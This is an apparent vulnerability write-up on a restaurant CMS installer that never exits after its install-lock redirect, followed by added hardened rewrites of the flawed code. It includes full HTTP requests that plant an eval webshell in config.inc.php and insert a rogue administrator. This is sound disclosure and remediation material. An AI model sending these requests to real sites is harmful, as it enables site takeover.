The problem lies in the /install/index.php file. After the program has been installed, an install.lock file is generated in the program's root directory, but /install/index.php gets the check for install.lock wrong.
" h2 v9 j, j( Y, W9 _
<?php
if(file_exists("../install.lock"))
{
    header("Location: ../");    // no exit after the redirect
}

//echo 'tst';exit;
require_once("init.php");
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
So when install.lock exists, header() only issues a 302 redirect and the script never exits, which means the logic below still runs. At least two vulnerabilities follow from this.

1. getshell (very dangerous)
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
{
    $smarty->assign("step",1);
    $smarty->display("index.html");
}elseif($_REQUEST['step']==2)
{
    $mysql_host=trim($_POST['mysql_host']);
    $mysql_user=trim($_POST['mysql_user']);
    $mysql_pwd=trim($_POST['mysql_pwd']);
    $mysql_db=trim($_POST['mysql_db']);
    $tblpre=trim($_POST['tblpre']);
    $domain==trim($_POST['domain']);    // sic: == instead of =, so $domain is never assigned
    $str="<?php \r\n";
    $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
    $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
    $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
    $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";
    $str.='define("MYSQL_CHARSET","GBK");'."\r\n";
    $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
    $str.='define("DOMAIN","'.$domain.'");'."\r\n";
    $str.='define("SKINS","default");'."\r\n";
    $str.='?>';
    file_put_contents("../config/config.inc.php",$str);    // writes the submitted data into a PHP file
The code above writes the POSTed values straight into ../config/config.inc.php without any escaping, so submitting the following POST request plants a one-line webshell:
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.80.129/canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 126

mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
But this method is dangerous and will leave the site unable to run: the injected ?> closes PHP mode, so every define() after MYSQL_HOST (MYSQL_USER, MYSQL_PWD, MYSQL_DB and the rest) is emitted as literal text instead of being executed, and the overwritten config.inc.php no longer contains a working database configuration.
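As an added example (my code, not the CMS's or the original post's), here is the step-2 config writer rebuilt as two functions so the injection and a fix can be compared side by side. build_config_vulnerable() reproduces the page's string concatenation; build_config_hardened() is a suggested fix that whitelists the constant names, emits every value through var_export() and drops the closing tag. The function names, the whitelist and the round-trip check are assumptions of this example; the input is the set of field values from the step=2 request above.

```php
<?php
// Added example, not the CMS's own code. Rebuilds the step-2 config writer
// from /install/index.php as two functions so the injection and a fix can be
// compared. build_config_vulnerable() reproduces the page's concatenation;
// build_config_hardened() is a suggested fix (an assumption of this example).

// Vulnerable: the value is pasted between literal double quotes, so a value
// that starts with  ");  closes the string and the define() call, and a
// PHP closing tag later in the value drops the rest of the file out of
// code context (see the page's mysql_host payload).
function build_config_vulnerable(array $values): string
{
    $str = "<?php \r\n";
    foreach ($values as $name => $value) {
        $str .= 'define("' . $name . '","' . $value . '");' . "\r\n";
    }
    return $str . '?>';
}

// Hardened: constant names are whitelisted, every value is emitted with
// var_export(), which yields a correctly escaped single-quoted PHP literal
// (a closing tag inside a string literal does not end PHP mode), and the
// file ends after the last statement so nothing can dangle behind it.
function build_config_hardened(array $values): string
{
    static $allowed = ['MYSQL_HOST', 'MYSQL_USER', 'MYSQL_PWD', 'MYSQL_DB',
                       'MYSQL_CHARSET', 'TABLE_PRE', 'DOMAIN', 'SKINS'];
    $str = "<?php\n";
    foreach ($values as $name => $value) {
        if (!in_array($name, $allowed, true)) {
            throw new InvalidArgumentException("unexpected constant: $name");
        }
        $str .= 'define(' . var_export($name, true) . ', '
              . var_export((string) $value, true) . ");\n";
    }
    return $str;
}

// Constructed input: the field values from the page's step=2 POST body.
$values = [
    'MYSQL_HOST'    => 'test");@eval($_POST[x]);?>//',
    'MYSQL_USER'    => '1',
    'MYSQL_PWD'     => '2',
    'MYSQL_DB'      => '3',
    'MYSQL_CHARSET' => 'GBK',
    'TABLE_PRE'     => 'koufu_',
    'DOMAIN'        => 'www',
    'SKINS'         => 'default',
];

echo "--- vulnerable config.inc.php ---\n", build_config_vulnerable($values), "\n\n";
echo "--- hardened config.inc.php ---\n",   build_config_hardened($values), "\n";

// Round trip: include the hardened file and confirm the payload came back as
// an inert string and that the include produced no output. The vulnerable
// file is deliberately not included, since that would run the eval().
$tmp = tempnam(sys_get_temp_dir(), 'cfg');
file_put_contents($tmp, build_config_hardened($values));
ob_start();
require $tmp;
$leaked = ob_get_clean();
unlink($tmp);
if ($leaked !== '' || MYSQL_HOST !== $values['MYSQL_HOST'] || MYSQL_PWD !== '2') {
    throw new RuntimeException('hardened config did not round-trip cleanly');
}
echo "hardened config round-tripped: MYSQL_HOST is an inert string\n";
```

Run it with the php CLI and compare the two outputs. var_export() is the right primitive because it produces a single-quoted PHP literal with quotes and backslashes escaped, so the attacker's value stays a string no matter what it contains; the original fails because the value lands between bare double quotes and its closing tag then lands in code context. Leaving out the trailing ?> is a second, independent safeguard: nothing after the last define() can ever be interpreted.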
2. Adding an administrator directly
elseif($_REQUEST['step']==5)
{
    if($_POST)
    {
        require_once("../config/config.inc.php");
        $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
        mysql_select_db(MYSQL_DB,$link);
        mysql_query("SET NAMES ".MYSQL_CHARSET );
        mysql_query("SET sql_mode=''");

        $adminname=trim($_POST['adminname']);
        $pwd1=trim($_POST['pwd1']);
        $pwd2=trim($_POST['pwd2']);
        if(empty($adminname))
        {
            echo "<script>alert('管理员不能为空');history.go(-1);</script>";    // "administrator must not be empty"
            exit();
        }
        if(($pwd1!=$pwd2) or empty($pwd1))
        {
            echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";    // "the two passwords do not match"; again no exit here
        }
        mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");    // an administrator is inserted regardless
    }
So we can directly insert an administrator account qingshen/qingshen with the following request:
POST /canting/install/index.php?m=index&step=5 HTTP/1.1
Host: 192.168.80.129
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.2cto.com/canting/install/index.php?step=1
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

adminname=qingshen&pwd1=qingshen&pwd2=qingshen
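As an added example (not code from the post or the CMS), the step-5 flow rewritten the way the installer should have worked: the lock check redirects and exits, the password check alerts and exits, and only then is the administrator inserted, through a prepared statement rather than by interpolating $adminname into the query string as the original does. It also covers the lock-check fix from the start of the post, since the same guard applies to every step. PDO with an in-memory SQLite database stands in for the mysql_* connection and password_hash() stands in for the CMS's umd5() so the script runs stand-alone; the function names, the lock path and the sample POST bodies are assumptions of this example.

```php
<?php
// Added example, not the CMS's own code. Rebuilds the installer's step-5
// logic so the two control-flow mistakes the page points out (header() with
// no exit, and the password-mismatch alert with no exit) are fixed, and the
// admin insert becomes a prepared statement. PDO with an in-memory SQLite
// database stands in for the mysql_* connection so this runs stand-alone;
// password_hash() stands in for the CMS's umd5(). Function names, the lock
// path and the sample POST bodies are assumptions of this example.

// Guard every installer request: if install.lock exists, redirect AND stop.
// header() only queues a response header; the script keeps running until
// exit, which is the bug the page starts from.
function require_not_installed(string $lockPath): void
{
    if (file_exists($lockPath)) {
        header('Location: ../');
        exit;
    }
}

// The page's alert-and-go-back pattern, with the exit it was missing.
function fail_back(string $msg): void
{
    echo '<script>alert(' . json_encode($msg) . ');history.go(-1);</script>';
    exit;
}

// Validation as a pure function: returns null when the input is acceptable,
// otherwise the message to show. Keeping it pure lets the rejection be
// checked without a browser.
function validate_admin(array $post): ?string
{
    $name = trim($post['adminname'] ?? '');
    $pwd1 = trim($post['pwd1'] ?? '');
    $pwd2 = trim($post['pwd2'] ?? '');
    if ($name === '') {
        return 'administrator name must not be empty';
    }
    if ($pwd1 === '' || $pwd1 !== $pwd2) {
        return 'the two passwords do not match';
    }
    return null;
}

// Parameterised insert. The table prefix comes from config, not from the
// request, but it is still restricted to identifier characters before it is
// spliced into the statement text.
function create_admin(PDO $db, string $tblpre, string $name, string $pwd): void
{
    if (!preg_match('/^[A-Za-z0-9_]*$/', $tblpre)) {
        throw new InvalidArgumentException('bad table prefix');
    }
    $stmt = $db->prepare("INSERT INTO {$tblpre}admin (adminname, password, isfounder) VALUES (?, ?, 1)");
    $stmt->execute([$name, password_hash($pwd, PASSWORD_DEFAULT)]);
}

// ---- stand-alone run with constructed input -------------------------------
require_not_installed(__DIR__ . '/install.lock');   // in the CMS: ../install.lock

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE koufu_admin (adminname TEXT, password TEXT, isfounder INTEGER)');

// Constructed POST bodies: the page's request, and a mismatched pair that
// the original code alerted on and then inserted anyway.
$good = ['adminname' => 'qingshen', 'pwd1' => 'qingshen', 'pwd2' => 'qingshen'];
$bad  = ['adminname' => 'qingshen', 'pwd1' => 'qingshen', 'pwd2' => 'other'];

if (validate_admin($bad) === null) {
    throw new RuntimeException('mismatched passwords were accepted');
}
if (($err = validate_admin($good)) !== null) {
    fail_back($err);
}
create_admin($db, 'koufu_', $good['adminname'], $good['pwd1']);

$count = (int) $db->query('SELECT COUNT(*) FROM koufu_admin')->fetchColumn();
echo "rows in koufu_admin after one valid request: $count\n";
```

Run it with the php CLI (header() is a no-op there, so the guard simply passes when no lock file is present). In a real installer the guard runs before the step dispatch, so once install.lock exists neither step=2 nor step=5 is reachable at all; the narrower fix the page implies, an exit after the header() call and another after the mismatch alert, is exactly what require_not_installed() and fail_back() encode.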